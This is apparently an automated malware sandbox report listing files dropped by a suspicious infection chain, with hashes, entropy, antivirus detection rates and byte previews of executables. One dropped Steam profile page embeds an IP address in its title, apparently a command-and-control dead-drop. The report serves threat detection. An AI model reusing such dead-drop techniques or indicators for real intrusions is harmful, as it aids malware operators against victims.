                                                                                                                                                                                                                                        SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                                                                                                                                                                        SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):617
                                                                                                                                                                                                                                        Entropy (8bit):5.3554278163807965
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAt92n4M9XKbbDLI4MWuPJKAVKharkvoDLI4MWuCv:ML9E4Ke84qXKDE4KhKiKhIE4Ks
                                                                                                                                                                                                                                        MD5:783B5197F36053BBA046C2EF2515F80E
                                                                                                                                                                                                                                        SHA1:49CB890E4C6536FD79EF1C7BE83949509B37A824
                                                                                                                                                                                                                                        SHA-256:9513A3E5E55C5471F606E5E0B06C46CD4E357F46602BBF43F24E1E70572F5F91
                                                                                                                                                                                                                                        SHA-512:6ACD461D38A8F665E6CF4B585B720ABEB0B3F8556C817E576991DF758D9FFE68479B2E634EB60223C7B7909F34C7A1853F13F0CEE3CB4F7C5951228A91BE24C4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                                                        Process:C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):425
                                                                                                                                                                                                                                        Entropy (8bit):5.353683843266035
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                                                                                        MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                                                                                        SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                                                                                        SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                                                                                        SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102264
                                                                                                                                                                                                                                        Entropy (8bit):4.028223287331754
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:p9kaAukHQNNT+LivhTirG6ndC0FbGKYYJ2:vkaAuGQNNT5hTig0Fb0d
                                                                                                                                                                                                                                        MD5:EA57692D44BF7E6B6EB80415028C1C84
                                                                                                                                                                                                                                        SHA1:2FCE0466357C4DCB5624DA0BF6297EF4B9C280BF
                                                                                                                                                                                                                                        SHA-256:56109F1D25270057D1E78FAC307515BA8C032D86B14CAB4C149E6F5198ABE41A
                                                                                                                                                                                                                                        SHA-512:0B6B68C0E3F5812936D2E8DFCE1D6711A4F5E3544FBB2EDBD5ADD720A4E6D45BD6BCFFB27B9AAC3A20EF4F988FD00FC801D612C681721D9EB6947EE272E369FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....h... ...x...P.......P...........P...X.......]..................(...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a..
                                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):104952
                                                                                                                                                                                                                                        Entropy (8bit):4.012147982809804
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:jkDyzoITtxWZYlphQimWGTn2VwFDKjv3YWG5:jkDykITtxWshQi9wFEv3Yp
                                                                                                                                                                                                                                        MD5:CE6C7972094CF69027BACEE32E915334
                                                                                                                                                                                                                                        SHA1:C9247D8E77FD56CBF055C4BB3B549231AEF5AFFB
                                                                                                                                                                                                                                        SHA-256:07907E72AD9A42A54DCBD12AB7138201C24C144E2BAE50BBA589FF48C7E9F9B3
                                                                                                                                                                                                                                        SHA-512:773FCDC24ACB1FB05989E3E98AC5D5F7549D631948DDB1D08ACC94C2F71DE122CA34F03A173C6E89E1510AA290F9F9103BC5E98C1E3D537EB9BE26CB0EF6BDFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....h... ..............P..............X...(...]...X...................V.......e.n.-.C.H.;.e.n.-.G.B...............x..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................... ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a..
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11496960
                                                                                                                                                                                                                                        Entropy (8bit):7.95681767955623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:196608:0GTSo6ARyCFMI19DwkfAuYI8wha0mlCGMbM77RWWuhJzoSpc92tQRqIDfrDap1B6:0GTz6uyCfDwkfAuH8kv477RWXJs59Nqs
                                                                                                                                                                                                                                        MD5:D60D266E8FBDBD7794653ECF2ABA26ED
                                                                                                                                                                                                                                        SHA1:469ED7D853D590E90F05BDF77AF114B84C88DE2C
                                                                                                                                                                                                                                        SHA-256:D4DF1ABA83289161D578336E1B7B6DAF7269BB73ACC92BD9DFA2C262EBC6C4D2
                                                                                                                                                                                                                                        SHA-512:80DF5D568E34DFC086F546E8D076749E58A7230ED1AA33F3A5C9D966809BECADC9922317095032D6E6A7ECDFBFBCE02A72CC82513AB0D132C5FFA6C07682BD87
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 64%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....+.f..........#.................]p.........@.............................`............ .....................................................<....P......@...`*...........................................F..(.......8............... ............................text...6........................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..p.-......................... ..`.text1..X...........................@....text2...`.......b..................`..h.rsrc........P.......h..............@..@........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):363424
                                                                                                                                                                                                                                        Entropy (8bit):7.987313898927024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:wF3qqFa1f0K9FDe8RGO93XozFt6tZjEZewycRZEelJYHq2bKEO:m3J6FDe8YOWz2tZwZrZEeDFEO
                                                                                                                                                                                                                                        MD5:384A847AD2833788FA253433FD2EEA8D
                                                                                                                                                                                                                                        SHA1:1984D8788FE40BD95A90D7D4E9DEA6C4E4FF6201
                                                                                                                                                                                                                                        SHA-256:DE30491736617249B3E80FC9436ECF0F7675B3C3014509398C3DB7298F93336A
                                                                                                                                                                                                                                        SHA-512:BCDBD44837629D8881C29A7C7F6A2D4E98B52FBC49952BAD2C89340A1DEE18FAC9987AAA8A3D91905A1F88A216C0E2501201A8665F3DF7D5F627FF71A2418AAC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 70%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..f.................2..........~Q... ...`....@.. ....................................`.................................,Q..O....`..............xe..(&...........O............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B................`Q......H........A..............................................................VeO..z..?Z..#...b..t.H.xK.......+...,...57....>1.G2.%j.......u.-.E.mR.U....-6W.4.bW...5.>B...].. ..s..f.'.(o...}..k.P..q>j...][T..............s.p}HT-o8.....^.....p.....K7?.n.tEK>^.8.p.....+.bW...{:S...j...Z......z.d2.i....65.u.|.vUy1....#6......P...}.$..K..\X....$..Z.D....X..q.K.^..I.>.L.j.v...-H.-.K...E.G...)r..C.,y-^6............~MJ).'....K...."p.5...9...A..0..sCU..=.......FYy...
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):423328
                                                                                                                                                                                                                                        Entropy (8bit):7.9889468260390535
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:ruFHcG6dc0A3+yfikluZRt6wfSYZc6pNLuvFJzPmhsiqvK5XEHAkgDkJEO:rCL3+YllubttfS16pNuTUqi1EE2EO
                                                                                                                                                                                                                                        MD5:A463E516041F4BC84F03BC8FE2B643DD
                                                                                                                                                                                                                                        SHA1:5A3EC50E94565671531E1CE66C2EE1D1A88A0E09
                                                                                                                                                                                                                                        SHA-256:68024EBC8676FEB8C4B480F5042A8FE8F108A88FC20FC6DBFC3CF92707F148B8
                                                                                                                                                                                                                                        SHA-512:5657068CF82679A6CC5636FE4F465834F9340EF0C48A35CA412988F50909922654291BED9178B8990EBA2430569E1EBECD45CAD119C5A524616C75187D4DABDE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 40%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H........*..............................................................p....C...~V...{..S..gi.~f..<......(.Q>;&.&...F+.&/.g..c^.,q.v...[0..BW.e.P}..........(.....D.(D.h]....2..1.P..3@K........0JX....r...yJ.&...g....A...G..R`...6..t....<40........9.. !G..W*.`..6 #..D..7.;.{...-..4...TQ.0Vs..U..!DU..).np...!..l.S...H......A.D_.d...N.15.ouP...r.G..;.$qt.y...I.'...'...]?......d.........s<;(.yd3..4.:..U. .......n.9....u-![...~p..e.8....n.Cn`..8.q...J.L..$F.
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):415943
                                                                                                                                                                                                                                        Entropy (8bit):7.9904721611397775
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:6144:rBrkDIY0uBcDXK+KgEqBG7nkmfVRSG5rO4lNhCV6JRIc+9dIbCtWeJAH:oNgYLkm9RSYbNhu6DS9dIbufy
                                                                                                                                                                                                                                        MD5:D399F8ABCA97B04F273F04322E4378BE
                                                                                                                                                                                                                                        SHA1:C62B4FA298116B3DD6943E950C8DFF80BA8AC64C
                                                                                                                                                                                                                                        SHA-256:EEB12C473444D2ACDE8CB542B65CCFDB0E8551B95B59969FA531574283BA78C1
                                                                                                                                                                                                                                        SHA-512:7104CD7C79880DDE790E7B28DA423013F4C1D9A8E6D365F9B2B1E36FDE62003F6D2635C4EF7DA35B4C887BC8527FA47D949B7EF1128BE5318A69EC02BAF6FF07
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>..f.............................:... ...@....@.. ....................................`..................................:..S....@..............xO..(&...`......`9............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H........*...............................................................j....(.m........u..B...+..g....M.....D..g..%n.w..M..O....@...f...[a....`.3..y..\L..y...G.........8...n..E.up.flqh...:...1H.C.................i..]6*..NgV...F.....t.A...b..h...\........r...&.&*kM.....Pa.FG....-I.%...T....'.|z.A......Sh.../......F...@...F.&...l...s.....J..F....j..5.e7....O.h..-k..U.N..`.........v.....^....S..;v.^..?.!.ZQx..^..Sh.4 .^..\.@.....-b.7..?......7+8....1....T6.
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3037032
                                                                                                                                                                                                                                        Entropy (8bit):6.781602952551882
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:PqRtSgOLEJxW+BmNlgtTTqEva2+qb6Xy3gIYvfe2radRo8ap5XAnZ2JarsW:VgaEJxlBolgtCEvZuXyQbUzozXAnZUW
                                                                                                                                                                                                                                        MD5:098E15E88E5332253356C78BADF8D479
                                                                                                                                                                                                                                        SHA1:D5AAEB94EC0D92BD9AA7D4B76860E9C25CF10EE2
                                                                                                                                                                                                                                        SHA-256:6B89CDFE0D3EBC90994EE564AAC9C88B0DF80F25720AEDADFF660A0D079AD0C9
                                                                                                                                                                                                                                        SHA-512:27E7480332F7F07916399D9515057750E43F42D68AEBA095C77AB76616F899F49269EC78738F10D39D6869F67FF4EF768C03BA52A649C652AFA9EE161F2E1892
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 56%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$......... ...N...N...N......N.`6....N...K...N.#i....N.#i...N...M...N...J..N...K..N...O...N..P5...N.i.O..N...O.:.N.i.K..N.i.N...N.l....N.......N.i.L...N.Rich..N.........................PE..L.....%`.................8...........$.......P....@...................................!...@..........................%.....T...\.... ...f...........>..h............)..T...................D*.......)..@............P...............................text....@.......8.................. ..`.rdata...0...P...(...<..............@..@.data............n...d..............@....tls................................@....gfids..............................@..@.rsrc....f... ...h..................@..@........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34740
                                                                                                                                                                                                                                        Entropy (8bit):5.3997823573284265
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Rdpqme0Ih3tAA6WG1IfcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2So:Rd8me0Ih3tAA6WG1IFhTBv++nIjBtPFB
                                                                                                                                                                                                                                        MD5:1DACA61847BB0F0F148817BBC5C522ED
                                                                                                                                                                                                                                        SHA1:FAF184085DB4274B4E1FA9D571C1BB308C8EAEA7
                                                                                                                                                                                                                                        SHA-256:39BEB8050AD532D05CA8717C8DBF18512CA1B6631920BB2F252E854251CFE4C1
                                                                                                                                                                                                                                        SHA-512:F0BBA882CDD12CFD3A12EAF1D47A6959D7DB93A713CFABA981699448C220065963FCF2584FE33198663E705FE552E1C5C158120E895F7012EF171B799C29D6B4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://116.203.165.127|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link h
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22487040
                                                                                                                                                                                                                                        Entropy (8bit):5.272510082812899
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:Y/pLh1GGefzPX7NMW/uegYYFa5g1XkEN2shGZ5gzo/3KR:Yf1GPXpb/ue1Aa5g1NNDmv/3
                                                                                                                                                                                                                                        MD5:CB3952F1852179348F8D2DB91760D03B
                                                                                                                                                                                                                                        SHA1:4D2C9D9B09226524868760263C873EDC664456A9
                                                                                                                                                                                                                                        SHA-256:A9EA40670A686E175CC8C32E3FC6BA92505379303D6524F149022490A2DDA181
                                                                                                                                                                                                                                        SHA-512:163006435A30B31FF0B079215EFC0CEDF6A624516AF1FFCCBC6144CFDB205B822029D523F28EC86E0391AF1B741771B860CF4D3492C87567A55F541A39C69D11
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 26%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..h...W..,.............@..............................`......*W...`... ...................................... Z.N....0Z.X....pZ......pM..f...........`\..P..........................._M.(....................4Z.X............................text... .h.......h.................`.``.data....+....i..,....h.............@.`..rdata...-...@p......&p.............@.`@.pdata...f...pM..h...TM.............@.0@.xdata..`.....P.......P.............@.0@.bss.....+....P.......................`..edata..N.... Z.......P.............@.0@.idata..X....0Z.......P.............@.0..CRT....p....PZ.......P.............@.@..tls.........`Z.......P.............@.@..rsrc........pZ.......P.............@.0..reloc...P...`\..R....R.............@.0B................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):183943
                                                                                                                                                                                                                                        Entropy (8bit):7.998396320845189
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:G97TNKt5umv9W4wZZy2tInpRsFjP5loWIkMCzKDIxH9KOlud228X6gXTfweCjcv:I/NKt5fv5P2tInQP5loWIUKp6KgjfOcv
                                                                                                                                                                                                                                        MD5:E6BEADEF5F58C272397A49C9D5715641
                                                                                                                                                                                                                                        SHA1:C324EAA435785C9C1ECEF611A9D1CFE65A166314
                                                                                                                                                                                                                                        SHA-256:183DF35420C19334BAC8DDE9C9A581AB232215CA4D3393E5688F31E69F42290A
                                                                                                                                                                                                                                        SHA-512:4FB61EFA95ED3044370C7C9F766C47DF67415AE856C85F78F55009707738BCB58E815C3F2902FE925AEDD31A4C27EB8FF4519DB371B0C61FEBD472C26910347C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T..f.............................(... ...@....@.. ....................................`..................................(..S....@..............x=..(&...`......`'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......................................................................$..hII#MtzNi.T.............`...&g~....n~^..r.b..f.r.Ga.x.|....}.Ib....PL:d.6... ......:E$7....e.aW...!..m5..5@..7W...........H:....+.(g...\[.k.z5.b....yd.)8....]K.._.}oB$......<]....K..%...On..j...nA}.P^.f.6Z|.._*..XcsF^....O].CQ..w...*.K..ts........F...H...].?WT>"f.].*..v.......$_...Lm.?.AO[9....e.8.~.e.....]NH.[L7\C...I.{.|.A....\..F.L;M..CG.:..d..K>.....6"b..Ofy...u8...:.&.Qe7
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3141632
                                                                                                                                                                                                                                        Entropy (8bit):7.172503458895126
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:9f8m3F6fh7gW5YPOAfS7kALAcRbqIvKzHuXtkHZC1:9kmnW5mOkSgiRbIitk5I
                                                                                                                                                                                                                                        MD5:1FEDF314D7C5ED06FF6833C9C8FE5441
                                                                                                                                                                                                                                        SHA1:AC0F8C841D197A3DB368A3C646D242541ECE144B
                                                                                                                                                                                                                                        SHA-256:279AF267D365013227156575DCF61B6977CE4051DD4632515BD224314CEA7C59
                                                                                                                                                                                                                                        SHA-512:6328A2828A77FDAC906710552842A584208066033119F62AE0E97DA88DB37C35C02D368B554E58030D949E2DAD19715BF351284332706D939F8C6754D4DC9242
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................)..........)).. ...@)...@.. .......................`0...........@..................................)).K....`)......................@0.....O)).............................................. ............... ..H............text.....).. ....)................. ..`.sdata.......@).......).............@....rsrc........`).......).............@..@.reloc.......@0......./.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):361336
                                                                                                                                                                                                                                        Entropy (8bit):7.9885937954241255
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:bhywd9hXzy09jGc0Ov7VdLiMVgoO/5Zu6p9zMYNERq3z3tP9PGHUG6rVxYF7n3oO:44hDdj3FO/5ZRpRNnjSqSnL
                                                                                                                                                                                                                                        MD5:D687AF3B103399AA245807BB719878B7
                                                                                                                                                                                                                                        SHA1:C3D45032BFD13C7DC75F08E55CABA56D0A1D4A42
                                                                                                                                                                                                                                        SHA-256:CC7056857CEC7D81101AF02D79431F4E193090FEF7D505D1970D4B2846F385B9
                                                                                                                                                                                                                                        SHA-512:8482B42FB16963BDCC6BCE162F79F64E28BFA46977788DF2044A7A0E805E67D44991C6EF24E1DD45643C7F69ABC66DEB257F23E7680B25DA8C486DC5BA0FF978
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................P...........n... ........@.. ....................................`..................................n..S....................Z..x)..........`m............................................... ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............X..............@..B.................n......H........^................................................................$....sp...k.Ta.....|.K..?wN...-..m..E...C.9..-#....f..=...5spJ......z.s.._4v.ZUO.w...b...ne.sR..v@sO.4.] ......V.L.....TV[.X.vF......|..hI*..$<gb...v-Cm<[6R...8..!m..........'.?j....W`JI..!k........,.O.<9..W...X..LEq.... !......Q..$.@....,99..~...%(...\..|B..#.a... ......w..ZV..9.k..F.Zl........[.O..t....Gz&..c..yk&.N..;........T.fh.]Z.%....).=...-.Ig..T....*1.!..z...E...9.....x.
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):331640
                                                                                                                                                                                                                                        Entropy (8bit):7.987353721341769
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:abAWIT0bNaTfjfPsC/LEkuPlXVRKur64ZXzK7rrn31nvFRHW/SPxjM9jg3gfQ9:abA+bKTDjEkuPlFEurPm1nvvHW6Cjg3n
                                                                                                                                                                                                                                        MD5:E8E6CD9EC48FAFCCC174F7BF07D045E2
                                                                                                                                                                                                                                        SHA1:0DFCCF235DC62D2592F5062A1B9691043C14CC9E
